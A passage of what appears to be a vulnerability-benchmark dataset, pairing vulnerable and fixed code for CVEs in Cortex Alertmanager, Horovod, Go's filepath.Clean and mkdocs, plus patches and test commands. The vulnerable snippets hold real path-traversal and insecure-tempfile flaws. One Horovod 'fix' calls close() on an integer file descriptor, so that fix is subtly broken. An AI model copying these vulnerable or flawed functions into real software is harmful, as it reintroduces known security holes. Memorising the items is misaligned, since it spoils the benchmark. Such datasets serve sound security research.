types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n\t\tfor i := 0; i < v.Len(); i++ {\n\t\t\tfieldValue := v.Index(i)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Map {\n\t\tfor _, key := range v.MapKeys() {\n\t\t\tfieldValue := v.MapIndex(key)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_34_2", "commit": "e6a3da9", "file_path": "pkg/alertmanager/api.go", "start_line": 428, "end_line": 433, "snippet": "func validateGlobalConfig(cfg config.GlobalConfig) error {\n\tif cfg.SlackAPIURLFile != \"\" {\n\t\treturn errSlackAPIURLFileNotAllowed\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_34_1", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 42, "end_line": 49, "snippet": "var (\n\terrPasswordFileNotAllowed = errors.New(\"setting password_file, bearer_token_file and credentials_file is not allowed\")\n\terrOAuth2SecretFileNotAllowed = errors.New(\"setting OAuth2 client_secret_file is not allowed\")\n\terrTLSFileNotAllowed = errors.New(\"setting TLS ca_file, cert_file and key_file is not allowed\")\n\terrSlackAPIURLFileNotAllowed = errors.New(\"setting Slack api_url_file and global slack_api_url_file is not allowed\")\n\terrVictorOpsAPIKeyFileNotAllowed = errors.New(\"setting VictorOps api_key_file is not allowed\")\n\terrOpsGenieAPIKeyFileNotAllowed = errors.New(\"setting OpsGenie api_key_file is not allowed\")\n)"}, {"id": "fix_go_34_2", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 311, "end_line": 403, "snippet": "func validateAlertmanagerConfig(cfg interface{}) error {\n\tv := reflect.ValueOf(cfg)\n\tt := v.Type()\n\n\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n\tif !v.IsValid() || v.IsZero() {\n\t\treturn nil\n\t}\n\n\t// If the input config is a pointer then we need to get its value.\n\t// At this point the pointer value can't be nil.\n\tif v.Kind() == reflect.Ptr {\n\t\tv = v.Elem()\n\t\tt = v.Type()\n\t}\n\n\t// Check if the input config is a data type for which we have a specific validation.\n\t// At this point the value can't be a pointer anymore.\n\tswitch t {\n\tcase reflect.TypeOf(config.GlobalConfig{}):\n\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.OpsGenieConfig{}):\n\t\tif err := validateOpsGenieConfig(v.Interface().(config.OpsGenieConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.SlackConfig{}):\n\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// If the input config is a struct, recursively iterate on all fields.\n\tif t.Kind() == reflect.Struct {\n\t\tfor i := 0; i < t.NumField(); i++ {\n\t\t\tfield := t.Field(i)\n\t\t\tfieldValue := v.FieldByIndex(field.Index)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n\t\tfor i := 0; i < v.Len(); i++ {\n\t\t\tfieldValue := v.Index(i)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif t.Kind() == reflect.Map {\n\t\tfor _, key := range v.MapKeys() {\n\t\t\tfieldValue := v.MapIndex(key)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n\t\t\tif fieldValue.CanInterface() {\n\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_34_3", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 434, "end_line": 442, "snippet": "func validateGlobalConfig(cfg config.GlobalConfig) error {\n\tif cfg.OpsGenieAPIKeyFile != \"\" {\n\t\treturn errOpsGenieAPIKeyFileNotAllowed\n\t}\n\tif cfg.SlackAPIURLFile != \"\" {\n\t\treturn errSlackAPIURLFileNotAllowed\n\t}\n\treturn nil\n}"}, {"id": "fix_go_34_4", "commit": "03e023d", "file_path": "pkg/alertmanager/api.go", "start_line": 446, "end_line": 451, "snippet": "func validateOpsGenieConfig(cfg config.OpsGenieConfig) error {\n\tif cfg.APIKeyFile != \"\" {\n\t\treturn errOpsGenieAPIKeyFileNotAllowed\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/alertmanager/api.go\n+++ b/pkg/alertmanager/api.go\n@@ -1,88 +1,8 @@\n-func validateAlertmanagerConfig(cfg interface{}) error {\n-\tv := reflect.ValueOf(cfg)\n-\tt := v.Type()\n-\n-\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n-\tif !v.IsValid() || v.IsZero() {\n-\t\treturn nil\n-\t}\n-\n-\t// If the input config is a pointer then we need to get its value.\n-\t// At this point the pointer value can't be nil.\n-\tif v.Kind() == reflect.Ptr {\n-\t\tv = v.Elem()\n-\t\tt = v.Type()\n-\t}\n-\n-\t// Check if the input config is a data type for which we have a specific validation.\n-\t// At this point the value can't be a pointer anymore.\n-\tswitch t {\n-\tcase reflect.TypeOf(config.GlobalConfig{}):\n-\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n-\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n-\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(config.SlackConfig{}):\n-\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\n-\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n-\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n-\t\t\treturn err\n-\t\t}\n-\t}\n-\n-\t// If the input config is a struct, recursively iterate on all fields.\n-\tif t.Kind() == reflect.Struct {\n-\t\tfor i := 0; i < t.NumField(); i++ {\n-\t\t\tfield := t.Field(i)\n-\t\t\tfieldValue := v.FieldByIndex(field.Index)\n-\n-\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n-\t\tfor i := 0; i < v.Len(); i++ {\n-\t\t\tfieldValue := v.Index(i)\n-\n-\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\tif t.Kind() == reflect.Map {\n-\t\tfor _, key := range v.MapKeys() {\n-\t\t\tfieldValue := v.MapIndex(key)\n-\n-\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n-\t\t\tif fieldValue.CanInterface() {\n-\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\t}\n-\n-\treturn nil\n-}\n+var (\n+\terrPasswordFileNotAllowed = errors.New(\"setting password_file, bearer_token_file and credentials_file is not allowed\")\n+\terrOAuth2SecretFileNotAllowed = errors.New(\"setting OAuth2 client_secret_file is not allowed\")\n+\terrTLSFileNotAllowed = errors.New(\"setting TLS ca_file, cert_file and key_file is not allowed\")\n+\terrSlackAPIURLFileNotAllowed = errors.New(\"setting Slack api_url_file and global slack_api_url_file is not allowed\")\n+\terrVictorOpsAPIKeyFileNotAllowed = errors.New(\"setting VictorOps api_key_file is not allowed\")\n+\terrOpsGenieAPIKeyFileNotAllowed = errors.New(\"setting OpsGenie api_key_file is not allowed\")\n+)\n\n--- a/pkg/alertmanager/api.go\n+++ b/pkg/alertmanager/api.go\n@@ -1,6 +1,93 @@\n-func validateGlobalConfig(cfg config.GlobalConfig) error {\n-\tif cfg.SlackAPIURLFile != \"\" {\n-\t\treturn errSlackAPIURLFileNotAllowed\n+func validateAlertmanagerConfig(cfg interface{}) error {\n+\tv := reflect.ValueOf(cfg)\n+\tt := v.Type()\n+\n+\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n+\tif !v.IsValid() || v.IsZero() {\n+\t\treturn nil\n \t}\n+\n+\t// If the input config is a pointer then we need to get its value.\n+\t// At this point the pointer value can't be nil.\n+\tif v.Kind() == reflect.Ptr {\n+\t\tv = v.Elem()\n+\t\tt = v.Type()\n+\t}\n+\n+\t// Check if the input config is a data type for which we have a specific validation.\n+\t// At this point the value can't be a pointer anymore.\n+\tswitch t {\n+\tcase reflect.TypeOf(config.GlobalConfig{}):\n+\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n+\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.OpsGenieConfig{}):\n+\t\tif err := validateOpsGenieConfig(v.Interface().(config.OpsGenieConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n+\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.SlackConfig{}):\n+\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n+\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\n+\t// If the input config is a struct, recursively iterate on all fields.\n+\tif t.Kind() == reflect.Struct {\n+\t\tfor i := 0; i < t.NumField(); i++ {\n+\t\t\tfield := t.Field(i)\n+\t\t\tfieldValue := v.FieldByIndex(field.Index)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n+\t\tfor i := 0; i < v.Len(); i++ {\n+\t\t\tfieldValue := v.Index(i)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tif t.Kind() == reflect.Map {\n+\t\tfor _, key := range v.MapKeys() {\n+\t\t\tfieldValue := v.MapIndex(key)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n \treturn nil\n }\n\n--- /dev/null\n+++ b/pkg/alertmanager/api.go\n@@ -0,0 +1,9 @@\n+func validateGlobalConfig(cfg config.GlobalConfig) error {\n+\tif cfg.OpsGenieAPIKeyFile != \"\" {\n+\t\treturn errOpsGenieAPIKeyFileNotAllowed\n+\t}\n+\tif cfg.SlackAPIURLFile != \"\" {\n+\t\treturn errSlackAPIURLFileNotAllowed\n+\t}\n+\treturn nil\n+}\n\n--- /dev/null\n+++ b/pkg/alertmanager/api.go\n@@ -0,0 +1,6 @@\n+func validateOpsGenieConfig(cfg config.OpsGenieConfig) error {\n+\tif cfg.APIKeyFile != \"\" {\n+\t\treturn errOpsGenieAPIKeyFileNotAllowed\n+\t}\n+\treturn nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23536:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestAMConfigValidationAPI$ github.com/cortexproject/cortex/pkg/alertmanager\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23536:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestMultitenantAlertmanager_DeleteUserConfig|TestAMConfigListUserConfig|TestAMConfigValidationAPI|TestValidateAlertmanagerConfig)$' github.com/cortexproject/cortex/pkg/alertmanager\n"} {"cve_id": "CVE-2022-0315", "cve_description": "Insecure Temporary File in GitHub repository horovod/horovod prior to 0.24.0.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/horovod/horovod", "patch_url": ["https://github.com/horovod/horovod/commit/b96ecae4dc69fc0a83c7c2d3f1dde600c20a1b41"], "programing_language": "Python", "vul_func": [{"id": "vul_py_359_1", "commit": "655353fc345b6a2512839a5bfc7086a5c7c614cf", "file_path": "horovod/runner/js_run.py", "start_line": 96, "end_line": 146, "snippet": "def generate_jsrun_rankfile(settings, path=None):\n \"\"\"\n Generates rankfile to use with jsrun.\n It splits the cores among the processes, which leads to best performance according to experiments.\n\n Args:\n settings: Settings for running jsrun.\n Note: settings.num_proc and settings.hosts must not be None.\n path: Optional path of the rankfile.\n Note: this file will be overwritten.\n \"\"\"\n cpu_per_gpu = (lsf.LSFUtils.get_num_cores() * lsf.LSFUtils.get_num_threads()) // lsf.LSFUtils.get_num_gpus()\n host_list = (x.split(':') for x in settings.hosts.split(','))\n\n # Verify and truncate host list if necessary\n validated_list = []\n remaining_slots = settings.num_proc\n for host, slots in host_list:\n slots = int(slots)\n if slots > lsf.LSFUtils.get_num_gpus():\n raise ValueError('Invalid host input, slot count for host \\'{host}:{slots}\\' is greater '\n 'than number of GPUs per host \\'{gpus}\\'.'.format(\n host=host, slots=slots, gpus=lsf.LSFUtils.get_num_gpus()))\n needed_slots = min(slots, remaining_slots)\n validated_list.append((host, needed_slots))\n remaining_slots -= needed_slots\n if remaining_slots == 0:\n break\n if remaining_slots != 0:\n raise ValueError('Not enough slots on the hosts to fulfill the {slots} requested.'.format(\n slots=settings.num_proc))\n\n # Generate rankfile\n path = tempfile.mktemp() if path is None else path\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n rank = 0\n for host, slots in validated_list:\n cpu_val = 0\n tmp.write('\\n')\n for s in range(slots):\n tmp.write('rank: {rank}: {{ hostname: {host}; cpu: {{{scpu}-{ecpu}}} ; gpu: * ; mem: * }}\\n'.format(\n rank=rank,\n host=host,\n scpu=cpu_val,\n ecpu=cpu_val + cpu_per_gpu - 1\n ))\n rank += 1\n cpu_val += cpu_per_gpu\n return path"}], "fix_func": [{"id": "fix_py_359_1", "commit": "b96ecae4dc69fc0a83c7c2d3f1dde600c20a1b41", "file_path": "horovod/runner/js_run.py", "start_line": 96, "end_line": 151, "snippet": "def generate_jsrun_rankfile(settings, path=None):\n \"\"\"\n Generates rankfile to use with jsrun.\n It splits the cores among the processes, which leads to best performance according to experiments.\n\n Args:\n settings: Settings for running jsrun.\n Note: settings.num_proc and settings.hosts must not be None.\n path: Optional path of the rankfile.\n Note: this file will be overwritten.\n \"\"\"\n cpu_per_gpu = (lsf.LSFUtils.get_num_cores() * lsf.LSFUtils.get_num_threads()) // lsf.LSFUtils.get_num_gpus()\n host_list = (x.split(':') for x in settings.hosts.split(','))\n\n # Verify and truncate host list if necessary\n validated_list = []\n remaining_slots = settings.num_proc\n for host, slots in host_list:\n slots = int(slots)\n if slots > lsf.LSFUtils.get_num_gpus():\n raise ValueError('Invalid host input, slot count for host \\'{host}:{slots}\\' is greater '\n 'than number of GPUs per host \\'{gpus}\\'.'.format(\n host=host, slots=slots, gpus=lsf.LSFUtils.get_num_gpus()))\n needed_slots = min(slots, remaining_slots)\n validated_list.append((host, needed_slots))\n remaining_slots -= needed_slots\n if remaining_slots == 0:\n break\n if remaining_slots != 0:\n raise ValueError('Not enough slots on the hosts to fulfill the {slots} requested.'.format(\n slots=settings.num_proc))\n\n # Generate rankfile\n # using mkstemp here instead of insecure mktemp.\n # note that the caller is responsible for cleaning up this file\n if path is None:\n fd, path = tempfile.mkstemp()\n fd.close()\n\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n rank = 0\n for host, slots in validated_list:\n cpu_val = 0\n tmp.write('\\n')\n for s in range(slots):\n tmp.write('rank: {rank}: {{ hostname: {host}; cpu: {{{scpu}-{ecpu}}} ; gpu: * ; mem: * }}\\n'.format(\n rank=rank,\n host=host,\n scpu=cpu_val,\n ecpu=cpu_val + cpu_per_gpu - 1\n ))\n rank += 1\n cpu_val += cpu_per_gpu\n return path"}], "vul_patch": "--- a/horovod/runner/js_run.py\n+++ b/horovod/runner/js_run.py\n@@ -31,7 +31,12 @@\n slots=settings.num_proc))\n \n # Generate rankfile\n- path = tempfile.mktemp() if path is None else path\n+ # using mkstemp here instead of insecure mktemp.\n+ # note that the caller is responsible for cleaning up this file\n+ if path is None:\n+ fd, path = tempfile.mkstemp()\n+ fd.close()\n+\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-29804", "cve_description": "Incorrect conversion of certain invalid paths to valid, absolute paths in Clean in path/filepath before Go 1.17.11 and Go 1.18.3 on Windows allows potential directory traversal attack.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/go", "patch_url": ["https://github.com/golang/go/commit/5a89bb334d1280b0219108a8ee63c14dd04aa8fd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_255_1", "commit": "da608a20ed87b7c6c860eaaf4f2dec39492f9da4", "file_path": "src/path/filepath/path.go", "start_line": 89, "end_line": 161, "snippet": "func Clean(path string) string {\n\toriginalPath := path\n\tvolLen := volumeNameLen(path)\n\tpath = path[volLen:]\n\tif path == \"\" {\n\t\tif volLen > 1 && originalPath[1] != ':' {\n\t\t\t// should be UNC\n\t\t\treturn FromSlash(originalPath)\n\t\t}\n\t\treturn originalPath + \".\"\n\t}\n\trooted := os.IsPathSeparator(path[0])\n\n\t// Invariants:\n\t//\treading from path; r is index of next byte to process.\n\t//\twriting to buf; w is index of next byte to write.\n\t//\tdotdot is index in buf where .. must stop, either because\n\t//\t\tit is the leading slash or it is a leading ../../.. prefix.\n\tn := len(path)\n\tout := lazybuf{path: path, volAndPath: originalPath, volLen: volLen}\n\tr, dotdot := 0, 0\n\tif rooted {\n\t\tout.append(Separator)\n\t\tr, dotdot = 1, 1\n\t}\n\n\tfor r < n {\n\t\tswitch {\n\t\tcase os.IsPathSeparator(path[r]):\n\t\t\t// empty path element\n\t\t\tr++\n\t\tcase path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):\n\t\t\t// . element\n\t\t\tr++\n\t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n\t\t\t// .. element: remove to last separator\n\t\t\tr += 2\n\t\t\tswitch {\n\t\t\tcase out.w > dotdot:\n\t\t\t\t// can backtrack\n\t\t\t\tout.w--\n\t\t\t\tfor out.w > dotdot && !os.IsPathSeparator(out.index(out.w)) {\n\t\t\t\t\tout.w--\n\t\t\t\t}\n\t\t\tcase !rooted:\n\t\t\t\t// cannot backtrack, but not rooted, so append .. element.\n\t\t\t\tif out.w > 0 {\n\t\t\t\t\tout.append(Separator)\n\t\t\t\t}\n\t\t\t\tout.append('.')\n\t\t\t\tout.append('.')\n\t\t\t\tdotdot = out.w\n\t\t\t}\n\t\tdefault:\n\t\t\t// real path element.\n\t\t\t// add slash if needed\n\t\t\tif rooted && out.w != 1 || !rooted && out.w != 0 {\n\t\t\t\tout.append(Separator)\n\t\t\t}\n\t\t\t// copy element\n\t\t\tfor ; r < n && !os.IsPathSeparator(path[r]); r++ {\n\t\t\t\tout.append(path[r])\n\t\t\t}\n\t\t}\n\t}\n\n\t// Turn empty string into \".\"\n\tif out.w == 0 {\n\t\tout.append('.')\n\t}\n\n\treturn FromSlash(out.string())\n}"}], "fix_func": [{"id": "fix_go_255_1", "commit": "5a89bb334d1280b0219108a8ee63c14dd04aa8fd", "file_path": "src/path/filepath/path.go", "start_line": 89, "end_line": 173, "snippet": "func Clean(path string) string {\n\toriginalPath := path\n\tvolLen := volumeNameLen(path)\n\tpath = path[volLen:]\n\tif path == \"\" {\n\t\tif volLen > 1 && originalPath[1] != ':' {\n\t\t\t// should be UNC\n\t\t\treturn FromSlash(originalPath)\n\t\t}\n\t\treturn originalPath + \".\"\n\t}\n\trooted := os.IsPathSeparator(path[0])\n\n\t// Invariants:\n\t//\treading from path; r is index of next byte to process.\n\t//\twriting to buf; w is index of next byte to write.\n\t//\tdotdot is index in buf where .. must stop, either because\n\t//\t\tit is the leading slash or it is a leading ../../.. prefix.\n\tn := len(path)\n\tout := lazybuf{path: path, volAndPath: originalPath, volLen: volLen}\n\tr, dotdot := 0, 0\n\tif rooted {\n\t\tout.append(Separator)\n\t\tr, dotdot = 1, 1\n\t}\n\n\tfor r < n {\n\t\tswitch {\n\t\tcase os.IsPathSeparator(path[r]):\n\t\t\t// empty path element\n\t\t\tr++\n\t\tcase path[r] == '.' && r+1 == n:\n\t\t\t// . element\n\t\t\tr++\n\t\tcase path[r] == '.' && os.IsPathSeparator(path[r+1]):\n\t\t\t// ./ element\n\t\t\tr++\n\n\t\t\tfor r < len(path) && os.IsPathSeparator(path[r]) {\n\t\t\t\tr++\n\t\t\t}\n\t\t\tif out.w == 0 && volumeNameLen(path[r:]) > 0 {\n\t\t\t\t// When joining prefix \".\" and an absolute path on Windows,\n\t\t\t\t// the prefix should not be removed.\n\t\t\t\tout.append('.')\n\t\t\t}\n\t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n\t\t\t// .. element: remove to last separator\n\t\t\tr += 2\n\t\t\tswitch {\n\t\t\tcase out.w > dotdot:\n\t\t\t\t// can backtrack\n\t\t\t\tout.w--\n\t\t\t\tfor out.w > dotdot && !os.IsPathSeparator(out.index(out.w)) {\n\t\t\t\t\tout.w--\n\t\t\t\t}\n\t\t\tcase !rooted:\n\t\t\t\t// cannot backtrack, but not rooted, so append .. element.\n\t\t\t\tif out.w > 0 {\n\t\t\t\t\tout.append(Separator)\n\t\t\t\t}\n\t\t\t\tout.append('.')\n\t\t\t\tout.append('.')\n\t\t\t\tdotdot = out.w\n\t\t\t}\n\t\tdefault:\n\t\t\t// real path element.\n\t\t\t// add slash if needed\n\t\t\tif rooted && out.w != 1 || !rooted && out.w != 0 {\n\t\t\t\tout.append(Separator)\n\t\t\t}\n\t\t\t// copy element\n\t\t\tfor ; r < n && !os.IsPathSeparator(path[r]); r++ {\n\t\t\t\tout.append(path[r])\n\t\t\t}\n\t\t}\n\t}\n\n\t// Turn empty string into \".\"\n\tif out.w == 0 {\n\t\tout.append('.')\n\t}\n\n\treturn FromSlash(out.string())\n}"}], "vul_patch": "--- a/src/path/filepath/path.go\n+++ b/src/path/filepath/path.go\n@@ -29,9 +29,21 @@\n \t\tcase os.IsPathSeparator(path[r]):\n \t\t\t// empty path element\n \t\t\tr++\n-\t\tcase path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):\n+\t\tcase path[r] == '.' && r+1 == n:\n \t\t\t// . element\n \t\t\tr++\n+\t\tcase path[r] == '.' && os.IsPathSeparator(path[r+1]):\n+\t\t\t// ./ element\n+\t\t\tr++\n+\n+\t\t\tfor r < len(path) && os.IsPathSeparator(path[r]) {\n+\t\t\t\tr++\n+\t\t\t}\n+\t\t\tif out.w == 0 && volumeNameLen(path[r:]) > 0 {\n+\t\t\t\t// When joining prefix \".\" and an absolute path on Windows,\n+\t\t\t\t// the prefix should not be removed.\n+\t\t\t\tout.append('.')\n+\t\t\t}\n \t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n \t\t\t// .. element: remove to last separator\n \t\t\tr += 2\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-40978", "cve_description": "The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mkdocs/mkdocs", "patch_url": ["https://github.com/mkdocs/mkdocs/commit/1b15412f4caae476c262210315fd068d0521a833", "https://github.com/mkdocs/mkdocs/commit/57540911a0d632674dd23edec765189f96f84f6b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_137_1", "commit": "e0ba6d7", "file_path": "mkdocs/livereload/__init__.py", "start_line": 162, "end_line": 219, "snippet": " def _serve_request(self, environ, start_response):\n # https://bugs.python.org/issue16679\n # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984\n path = environ[\"PATH_INFO\"].encode(\"latin-1\").decode(\"utf-8\", \"ignore\")\n\n m = re.fullmatch(r\"/livereload/([0-9]+)/[0-9]+\", path)\n if m:\n epoch = int(m[1])\n start_response(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n\n def condition():\n return self._visible_epoch > epoch\n\n with self._epoch_cond:\n if not condition():\n # Stall the browser, respond as soon as there's something new.\n # If there's not, respond anyway after a minute.\n self._log_poll_request(environ.get(\"HTTP_REFERER\"), request_id=path)\n self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)\n return [b\"%d\" % self._visible_epoch]\n\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n if path.endswith(\"/\"):\n path += \"index.html\"\n path = path[len(self.mount_path):]\n file_path = os.path.join(self.root, path.lstrip(\"/\"))\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n else:\n return None # Not found\n\n # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.\n with self._epoch_cond:\n 